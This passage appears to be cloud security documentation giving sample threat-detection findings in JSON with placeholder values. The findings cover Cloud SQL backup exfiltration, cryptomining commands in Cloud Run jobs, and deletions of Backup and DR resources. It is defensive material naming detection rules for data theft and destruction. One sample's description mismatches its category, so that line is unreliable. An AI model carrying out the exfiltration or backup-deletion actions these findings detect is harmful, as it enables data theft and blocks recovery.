            "projectId": "SOURCE_PROJECT_ID",
            "resourceContainer": "projects/SOURCE_PROJECT_ID",
            "timestamp": { "seconds": "0", "nanos": 0.0 },
            "insertId": "INSERT_ID"
          }
        }
      ],
      "properties": {
        "restoreToExternalInstance": {
          "principalEmail": "PRINCIPAL_EMAIL",
          "sourceCloudsqlInstanceResource": "//cloudsql.googleapis.com/projects/SOURCE_PROJECT_ID/instances/SOURCE_INSTANCE_NAME",
          "backupId": "BACKUP_ID",
          "targetCloudsqlInstanceResource": "//cloudsql.googleapis.com/projects/TARGET_PROJECT_ID/instances/TARGET_INSTANCE_NAME"
        }
      },
      "findingId": "FINDING_ID",
      "contextUris": {
        "mitreUri": {
          "displayName": "MITRE Link",
          "url": "https://attack.mitre.org/techniques/T1567/002/"
        },
        "cloudLoggingQueryUri": [
          { "displayName": "Cloud Logging Query Link", "url": "LOGGING_LINK" }
        ],
        "relatedFindingUri": {
          "displayName": "Related CloudSQL Exfiltration findings",
          "url": "RELATED_FINDINGS_LINK"
        }
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2022-01-19T21:36:07.901Z",
    "createTime": "2022-01-19T21:36:08.695Z",
    "severity": "HIGH",
    "workflowState": "NEW",
    "canonicalName": "projects/SOURCE_PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "mute": "UNDEFINED",
    "findingClass": "THREAT",
    "mitreAttack": {
      "primaryTactic": "EXFILTRATION",
      "primaryTechniques": [ "EXFILTRATION_OVER_WEB_SERVICE", "EXFILTRATION_TO_CLOUD_STORAGE" ]
    },
    "access": {
      "principalEmail": "PRINCIPAL_EMAIL",
      "callerIp": "IP",
      "callerIpGeo": {},
      "serviceName": "cloudsql.googleapis.com",
      "methodName": "cloudsql.instances.restoreBackup"
    },
    "exfiltration": {
      "sources": [
        { "name": "//cloudsql.googleapis.com/projects/SOURCE_PROJECT_ID/instances/SOURCE_INSTANCE_NAME" }
      ],
      "targets": [
        { "name": "//cloudsql.googleapis.com/projects/TARGET_PROJECT_ID/instances/TARGET_INSTANCE_NAME" }
      ]
    }
  },
  "resource": {
    "name": "//cloudsql.googleapis.com/projects/SOURCE_PROJECT_ID/instances/SOURCE_INSTANCE_NAME/backupRuns/BACKUP_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/SOURCE_PROJECT_NUMBER",
    "projectDisplayName": "SOURCE_PROJECT_ID",
    "parentName": "//cloudsql.googleapis.com/projects/SOURCE_PROJECT_ID/instances/SOURCE_INSTANCE_NAME",
    "parentDisplayName": "SOURCE_INSTANCE_NAME",
    "type": "google.cloud.sql.Instance",
    "folders": [
      {
        "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
        "resourceFolderDisplayName": "FOLDER_ID"
      }
    ],
    "displayName": "mysql-backup-restore-instance"
  }
}

Impact: Cryptomining Commands

{
  "finding": {
    "access": {
      "callerIpGeo": {},
      "serviceName": "run.googleapis.com",
      "methodName": "/Jobs.CreateJob"
    },
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
    "category": "Impact: Cryptomining Commands",
    "chokepoint": {},
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "imageId": "CONTAINER_IMAGE_ID",
        "labels": [
          { "name": "command", "value": "getblockchaininfo" }
        ],
        "createTime": "1970-01-01T00:00:00Z"
      }
    ],
    "createTime": "2025-05-06T01:19:09.854Z",
    "database": {},
    "dataProtectionKeyGovernance": {},
    "eventTime": "2025-05-06T01:19:08.853Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "logEntries": [
      {
        "cloudLoggingEntry": {
          "insertId": "INSERT_ID",
          "logId": "cloudaudit.googleapis.com/system_event",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": "2025-05-06T01:18:02.533391Z"
        }
      }
    ],
    "mitreAttack": {
      "primaryTactic": "IMPACT",
      "primaryTechniques": [ "RESOURCE_HIJACKING" ]
    },
    "mute": "UNDEFINED",
    "muteInfo": {
      "staticMute": {
        "state": "UNDEFINED",
        "applyTime": "1970-01-01T00:00:00Z"
      }
    },
    "muteUpdateTime": "1970-01-01T00:00:00Z",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "securityPosture": {},
    "severity": "HIGH",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "displayName": "PROJECT_ID",
    "type": "google.cloud.resourcemanager.Project",
    "cloudProvider": "GOOGLE_CLOUD_PLATFORM",
    "service": "cloudresourcemanager.googleapis.com",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
      "parentDisplayName": "FOLDER_NAME",
      "folders": [
        {
          "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
          "resourceFolderDisplayName": "FOLDER_NAME"
        }
      ],
      "organization": "organizations/ORGANIZATION_ID"
    },
    "resourcePath": {
      "nodes": [
        { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_NUMBER", "displayName": "PROJECT_ID" },
        { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_NAME" },
        { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" }
      ]
    },
    "resourcePathString": "organizations/ORGANIZATION_ID/folders/FOLDER_NUMBER/projects/PROJECT_NUMBER"
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": {
      "ruleName": "cloud_run_jobs_cryptomining_commands"
    },
    "detectionPriority": "HIGH",
    "affectedResources": [
      { "gcpResourceName": "//run.googleapis.com/namespaces/PROJECT_ID/jobs/JOB_NAME" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": { "seconds": "1746494282", "nanos": 533391000 },
          "insertId": "INSERT_ID",
          "logId": "cloudaudit.googleapis.com/system_event"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1496/"
      },
      "cloudLoggingQueryUri": [
        { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" }
      ],
      "relatedFindingUri": {}
    }
  }
}

Impact: Deleted Google Cloud Backup and DR Backup

{
  "finding": {
    "access": {
      "principalEmail": "USER_EMAIL",
      "callerIp": "CALLER_IP",
      "callerIpGeo": { "regionCode": "REGION_CODE" },
      "serviceName": "backupdr.googleapis.com",
      "methodName": "google.cloud.backupdr.v1.BackupDR.DeleteBackup",
      "principalSubject": "user:USER_EMAIL"
    },
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID",
    "category": "Impact: Deleted Google Cloud Backup and DR Backup",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "EVENT_TIMESTAMP",
    "database": {},
    "description": "A backup stored in a backup vault has been manually deleted. The backup was stored in REGION",
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "IMPACT",
      "primaryTechniques": [ "DATA_DESTRUCTION" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "MEDIUM",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "type": "google.cloud.resourcemanager.Project",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "FOLDER_NAME",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": {
      "ruleName": "backup_delete_vault_backup"
    },
    "detectionPriority": "HIGH",
    "affectedResources": [
      { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER/locations/REGION/backupVaults/VAULT_ID/dataSources/DATA_SOURCE_NAME/backups/BACKUP_ID" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": { "seconds": "0", "nanos": 0.0 },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1485/"
      },
      "cloudLoggingQueryUri": [
        { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" }
      ],
      "relatedFindingUri": {}
    },
    "description": "A backup stored in a backup vault has been manually deleted. The backup was stored in REGION"
  }
}

Impact: Deleted Google Cloud Backup and DR host

{
  "finding": {
    "access": {
      "principalEmail": "USER_EMAIL",
      "callerIp": "CALLER_IP",
      "callerIpGeo": { "regionCode": "REGION_CODE" },
      "serviceName": "backupdr.googleapis.com",
      "methodName": "deleteHost",
      "principalSubject": "user:USER_EMAIL"
    },
    "attackExposure": {},
    "backupDisasterRecovery": {
      "host": "HOST_NAME",
      "applications": [ "HOST_NAME" ],
      "backupCreateTime": "EVENT_TIMESTAMP"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID",
    "category": "Impact: Deleted Google Cloud Backup and DR host",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "EVENT_TIMESTAMP",
    "database": {},
    "description": "A host was deleted from the Google Cloud Backup and DR Service. Applications that are associated with the deleted host might not be protected.",
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "IMPACT",
      "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "MEDIUM",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "type": "google.cloud.resourcemanager.Project",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "FOLDER_NAME",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": {
      "ruleName": "backup_hosts_delete_host"
    },
    "detectionPriority": "LOW",
    "affectedResources": [
      { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": { "seconds": "0", "nanos": 0.0 },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1490/"
      },
      "cloudLoggingQueryUri": [
        { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" }
      ],
      "relatedFindingUri": {}
    },
    "description": "A host was deleted from the Google Cloud Backup and DR Service. Applications that are associated with the deleted host might not be protected.",
    "backupDisasterRecovery": {
      "host": "HOST_NAME",
      "applications": [ "HOST_NAME" ]
    }
  }
}

Impact: Deleted Google Cloud Backup and DR plan association

{
  "finding": {
    "access": {
      "principalEmail": "USER_EMAIL",
      "callerIp": "CALLER_IP",
      "callerIpGeo": { "regionCode": "REGION_CODE" },
      "serviceName": "backupdr.googleapis.com",
      "methodName": "google.cloud.backupdr.v1.BackupDR.DeleteBackupPlanAssociation",
      "principalSubject": "user:USER_EMAIL"
    },
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID",
    "category": "Impact: Deleted Google Cloud Backup and DR plan association",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "EVENT_TIMESTAMP",
    "database": {},
    "description": "A backup plan has been removed from a workload. Backups are no longer scheduled on the workload. The resource(s) affected are in REGION",
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "IMPACT",
      "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "MEDIUM",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "type": "google.cloud.resourcemanager.Project",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "FOLDER_NAME",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "backup_delete_backup_plan_association" },
    "detectionPriority": "HIGH",
    "affectedResources": [
      { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER/backupPlanAssociations/BACKUP_PLAN_NAME" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": { "seconds": "0", "nanos": 0.0 },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1490/"
      },
      "cloudLoggingQueryUri": [
        { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" }
      ],
      "relatedFindingUri": {}
    },
    "description": "A backup plan has been removed from a workload. Backups are no longer scheduled on the workload. The resource(s) affected are in REGION"
  }
}

Impact: Deleted Google Cloud Backup and DR Vault

{
  "finding": {
    "access": {
      "principalEmail": "USER_EMAIL",
      "callerIp": "CALLER_IP",
      "callerIpGeo": { "regionCode": "REGION_CODE" },
      "serviceName": "backupdr.googleapis.com",
      "methodName": "google.cloud.backupdr.v1.BackupDR.DeleteBackupVault",
      "principalSubject": "user:USER_EMAIL"
    },
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID",
    "category": "Impact: Deleted Google Cloud Backup and DR Vault",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "EVENT_TIMESTAMP",
    "database": {},
    "description": "A Backup Vault has been deleted from the Google Cloud Backup and DR Service. The affected Backup Vault was hosted in VAULT_LOCATION",
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "IMPACT",
      "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "MEDIUM",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "type": "google.cloud.resourcemanager.Project",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "FOLDER_NAME",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "backup_delete_vault" },
    "detectionPriority": "HIGH",
    "affectedResources": [
      { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER/locations/REGION/backupVaults/VAULT_NAME" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": { "seconds": "0", "nanos": 0.0 },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1490/"
      },
      "cloudLoggingQueryUri": [
        { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" }
      ],
      "relatedFindingUri": {}
    },
    "description": "The expiration date for a backup has been reduced. The affected Backup Vault was hosted in REGION"
  }
}

Impact: Google Cloud Backup and DR delete policy

{
  "finding": {
    "access": {
      "principalEmail": "USER_EMAIL",
      "callerIp": "CALLER_IP",
      "callerIpGeo": { "regionCode": "REGION_CODE" },
      "serviceName": "backupdr.googleapis.com",
      "methodName": "deletePolicy",
      "principalSubject": "user:USER_EMAIL"
    },
    "attackExposure": {},
    "backupDisasterRecovery": {
      "policies": [ "DeleteMe" ],
      "backupCreateTime": "EVENT_TIMESTAMP"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID",
    "category": "Impact: Google Cloud Backup and DR delete policy",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "EVENT_TIMESTAMP",
    "database": {},
    "description": "A Google Cloud Backup and DR Service policy, which defines how a backup is taken and where it is stored, was deleted. Future backups that use the policy might fail.",
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "IMPACT",
      "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "LOW",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "type": "google.cloud.resourcemanager.Project",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "FOLDER_NAME",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "backup_template_delete_policy" },
    "detectionPriority": "LOW",
    "affectedResources": [
      { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": { "seconds": "0", "nanos": 0.0 },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1490/"
      },
      "cloudLoggingQueryUri": [
        { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" }
      ],
      "relatedFindingUri": {}
    },
    "description": "A Google Cloud Backup and DR Service policy, which defines how a backup is taken and where it is stored, was deleted. Future backups that use the policy might fail.",
    "backupDisasterRecovery": {
      "policies": [ "POLICY_NAME" ]
    }
  }
}

Impact: Google Cloud Backup and DR delete profile

{
  "finding": {
    "access": {
      "principalEmail": "USER_EMAIL",
      "callerIp": "IP_ADDRESS",
      "callerIpGeo": { "regionCode": "REGION_CODE" },
      "serviceName": "backupdr.googleapis.com",
      "methodName": "deleteSlp",
      "principalSubject": "user:USER_EMAIL"
    },
    "attackExposure": {},
    "backupDisasterRecovery": {
      "profile": "PROFILE_NAME",
      "backupCreateTime": "EVENT_TIMESTAMP"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID",
    "category": "Impact: Google Cloud Backup and DR delete profile",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "EVENT_TIMESTAMP",
    "database": {},
    "description": "A Google Cloud Backup and DR Service profile, which defines which storage pools should be used to store backups, was deleted. Future backups that use the profile might fail.",
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "IMPACT",
      "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "LOW",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "type": "google.cloud.resourcemanager.Project",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "FOLDER_NAME",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "backup_template_delete_profile" },
    "detectionPriority": "LOW",
    "affectedResources": [
      { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": { "seconds": "0", "nanos": 0.0 },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1490/"
      },
      "cloudLoggingQueryUri": [
        { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" }
      ],
      "relatedFindingUri": {}
    },
    "description": "A Google Cloud Backup and DR Service profile, which defines which storage pools should be used to store backups, was deleted. Future backups that use the profile might fail.",
    "backupDisasterRecovery": {
      "profile": "PROFILE_NAME"
    }
  }
}

Impact: Google Cloud Backup and DR delete storage pool

{
  "finding": {
    "access": {
      "principalEmail": "USER_EMAIL",
      "callerIp": "CALLER_IP",
      "callerIpGeo": { "regionCode": "REGION_CODE" },
      "serviceName": "backupdr.googleapis.com",
      "methodName": "deleteDiskPool",
      "principalSubject": "user:USER_EMAIL"
    },
    "attackExposure": {},
    "backupDisasterRecovery": {
      "storagePool": "STORAGE_POOL_NAME",
      "backupCreateTime": "EVENT_TIMESTAMP"
    },
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID",
    "category": "Impact: Google Cloud Backup and DR delete storage pool",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "createTime": "EVENT_TIMESTAMP",
    "database": {},
    "description": "A storage pool, which associates a Cloud Storage bucket with Google Cloud Backup and DR, has been removed from Backup and DR. Future backups to this storage target will fail.",
    "eventTime": "EVENT_TIMESTAMP",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {},
    "mitreAttack": {
      "primaryTactic": "IMPACT",
      "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Event Threat Detection",
    "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "severity": "MEDIUM",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "display_name": "PROJECT_ID",
    "type": "google.cloud.resourcemanager.Project",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID",
    "parent_display_name": "FOLDER_NAME",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_ID"
    },
    "detectionCategory": { "ruleName": "backup_storage_pools_delete" },
    "detectionPriority": "LOW",
    "affectedResources": [
      { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" },
      { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_ID",
          "timestamp": { "seconds": "0", "nanos": 0.0 },
          "insertId": "INSERT_ID"
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1490/"
      },
